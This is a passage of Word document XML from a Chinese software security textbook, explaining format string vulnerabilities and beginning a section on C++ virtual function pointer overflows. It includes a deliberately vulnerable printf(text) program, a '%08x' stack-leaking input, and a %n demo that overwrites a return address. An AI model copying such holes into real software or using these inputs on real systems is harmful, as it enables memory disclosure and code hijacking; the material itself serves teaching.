          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>vsprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>wprintf()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C5CBC"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通过“%s”并借助printf可以实现查看任意地址内容，如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.21</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示的代码，若输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08 x.%08x.%08x.%08x.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，printf(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>text)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将依次输出栈的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144E585D"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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2767FF09" wp14:editId="5BAFC33A">
                <wp:extent cx="5099322" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>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322" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0EB39A14"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00F87226">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.18</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1B2A972F"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int main() {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4BF6961A"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char text[1024];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4DE94DD8"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printf("input your string\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A5C2E9D"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scanf("%s",text);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0D74FA08"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printf(text);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BA8B2D6"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return 0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="71E1A2D7"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w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2767FF09" id="_x0000_s1152" type="#_x0000_t202" style="width:4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DNEwIAAP8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kn4u89XqbVFwJik2X+SLqyK1JRPl03GHPnxU0LM4qThSV5O8ON77ENMR5dOWeJsHo5udNiYt&#10;cF9vDbKjIAfs0pcqeLHNWDZUfLUslknZQjyfzNHrQA41uq/4dR6/yTMRxwfbpC1BaDPNKRNjT3wi&#10;kglOGOuR6Yb0F/Fw5FVD80jEECZH0guiSQf4m7OB3Fhx/+sgUHFmPlmivpovFtG+abFYviNEDC8j&#10;9WVEWElSFQ+cTdNtSJZPPNwtdWenE7fnTE45k8sSztOLiDa+XKddz+928wcAAP//AwBQSwMEFAAG&#10;AAgAAAAhAHEBNL3aAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwZvdJGIp&#10;MZtSBC/Sg60ePE6TMZsmOxuzmzb+e0cv9jLweMN73yvWs+vVicbQejaQLhJQxJWvW24MvL89361A&#10;hYhcY++ZDHxTgHV5fVVgXvsz7+i0j42SEA45GrAxDrnWobLkMCz8QCzepx8dRpFjo+sRzxLuep0l&#10;yVI7bFkaLA70ZKnq9pOTkm2opp3/OqbbTn/YbokPr/bFmNubefMIKtIc/5/hF1/QoRSmg5+4Dqo3&#10;IEPi3xVvldyLPBjIsjQDXRb6kr78AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKRi8M0T&#10;AgAA/wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHEB&#10;NL3aAAAABQEAAA8AAAAAAAAAAAAAAAAAbQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAB0BQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="0EB39A14"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00F87226">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.18</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1B2A972F"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int main() {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4BF6961A"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char text[1024];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4DE94DD8"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printf("input your string\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A5C2E9D"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scanf("%s",text);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0D74FA08"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printf(text);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5BA8B2D6"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 xml:space="preserve">    return 0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="71E1A2D7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00F87226" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F87226">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0A6E1" w14:textId="77777777"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E16270" wp14:editId="618A1869">
            <wp:extent cx="5825197" cy="398352"/>
            <wp:effectExtent l="0" t="0" r="4445" b="190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3210" cy="409158"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2EB6F7" w14:textId="7B41CF75" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00693CFA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:t>.18</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E0888"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通过“%n”结合printf还可以实现返回地址的修改，“%n”与其他格式说明符号不同，不向printf传递格式化信息，而是令printf把自己到目前已打出的字符总数放到相应变元指向的整形变量中，则通过精心设计，可以实现利用“%n”向任意地址写入任意数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0A2B56" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09D7570E" wp14:editId="25336A09">
                <wp:extent cx="5099322" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="6350" b="0"/>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322" cy="1404620"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0D3C3696"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hint="eastAsia"/>
                              </w:rPr>
                              <w:t>代码2</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00693CFA">
                              <w:rPr>
                                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                              </w:rPr>
                              <w:t>.19</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A06E358"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void functionown(int c){</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="554C926A"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unsigned char buf[2];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7599D87A"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printf("%74d%n",c,(int *)(buf+6));</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A12B6B5"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printf("%19d%n",c,(int *)(buf+7));</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2AF8174B"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printf("%64d%n",c,(int *)(buf+8));</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0AA27469"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printf("%n\r\n",c,(int *)(buf+9));</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1558A3A8"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w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="048B30C3"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int main(){</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6ADA5C50"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int a=1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="56146119"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printf("in a=%d\r\n",a);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="66DDD59F"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functionown(2);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="675910EC"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a=0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5EEB179B"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printf("out a=%d\r\n",a);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BF58865"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return 0;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="157E8AE6"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w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:spAutoFit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="09D7570E" id="_x0000_s1153" type="#_x0000_t202" style="width:4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Z47EwIAAP8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kn4u89XqbVFwJik2X+SLqyK1JRPl03GHPnxU0LM4qThSV5O8ON77ENMR5dOWeJsHo5udNiYt&#10;cF9vDbKjIAfs0pcqeLHNWDZUfLUslknZQjyfzNHrQA41uq/4dR6/yTMRxwfbpC1BaDPNKRNjT3wi&#10;kglOGOuR6Sbqx8ORVw3NIxFDmBxJL4gmHeBvzgZyY8X9r4NAxZn5ZIn6ar5YRPumxWL5jhAxvIzU&#10;lxFhJUlVPHA2TbchWT7xcLfUnZ1O3J4zOeVMLks4Ty8i2vhynXY9v9vNHwAAAP//AwBQSwMEFAAG&#10;AAgAAAAhAHEBNL3aAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwZvdJGIp&#10;MZtSBC/Sg60ePE6TMZsmOxuzmzb+e0cv9jLweMN73yvWs+vVicbQejaQLhJQxJWvW24MvL89361A&#10;hYhcY++ZDHxTgHV5fVVgXvsz7+i0j42SEA45GrAxDrnWobLkMCz8QCzepx8dRpFjo+sRzxLuep0l&#10;yVI7bFkaLA70ZKnq9pOTkm2opp3/OqbbTn/YbokPr/bFmNubefMIKtIc/5/hF1/QoRSmg5+4Dqo3&#10;IEPi3xVvldyLPBjIsjQDXRb6kr78AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHbVnjsT&#10;AgAA/wMAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHEB&#10;NL3aAAAABQEAAA8AAAAAAAAAAAAAAAAAbQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMA&#10;AAB0BQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="0D3C3696"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hint="eastAsia"/>
                        </w:rPr>
                        <w:t>代码2</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00693CFA">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>.19</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A06E358"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void functionown(int c){</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="554C926A"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unsigned char buf[2];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7599D87A"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printf("%74d%n",c,(int *)(buf+6));</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A12B6B5"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printf("%19d%n",c,(int *)(buf+7));</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2AF8174B"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printf("%64d%n",c,(int *)(buf+8));</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0AA27469"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ab/>
                        <w:t>printf("%n\r\n",c,(int *)(buf+9));</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1558A3A8"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w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="048B30C3"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int main(){</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6ADA5C50"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int a=1;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="56146119"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printf("in a=%d\r\n",a);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="66DDD59F"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functionown(2);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="675910EC"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a=0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5EEB179B"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printf("out a=%d\r\n",a);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BF58865"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 xml:space="preserve">    return 0;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="157E8AE6" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00693CFA" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00693CFA">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="732D6B97" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察以上代码，functionown通过printf，将0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>x74</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0x19</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别输出到buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>+6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的4字节，覆盖了functionown的返回地址，则functionown返回后，将跳转到0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>x00641974</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的位置继续执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181291B8" w14:textId="7143D6A3" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00563CB3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>格式化串溢出通过静态扫描较容易发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，部分编译器已经可以限制部分格式化字符串带来的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CFD70" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数指针溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F43710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以C++语言为例，在C++中有虚函数概念。虚函数：定义在一个类中，用virtual关键字标识，目的在于当有其它类继承此类时，可在不改变函数名和参数的情况下重写此方法，此时通过使用基类对象指针来调用虚函数，具体哪个类中的虚函数被调用由运行时决定，即由运行时指针具体指向的对象的类型决定。为了实现上述功能，一旦对象中定义了虚函数，在声明它的对象时会在特定的位置（位置取决于编译器）为对象添加一个成员_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vfptr，这个成员指向一个虚函数表，虚函数表内是一个个的函数地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1952F98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接下来看一下代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A579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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.20 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数指针溢出漏洞代码示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3E8576"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2592B84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class Base1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B4C01C"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193AA1C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public:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C29B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    int base1_1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB8A7E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    int base1_2;</w:t>
      </w:r>
    </w:p>
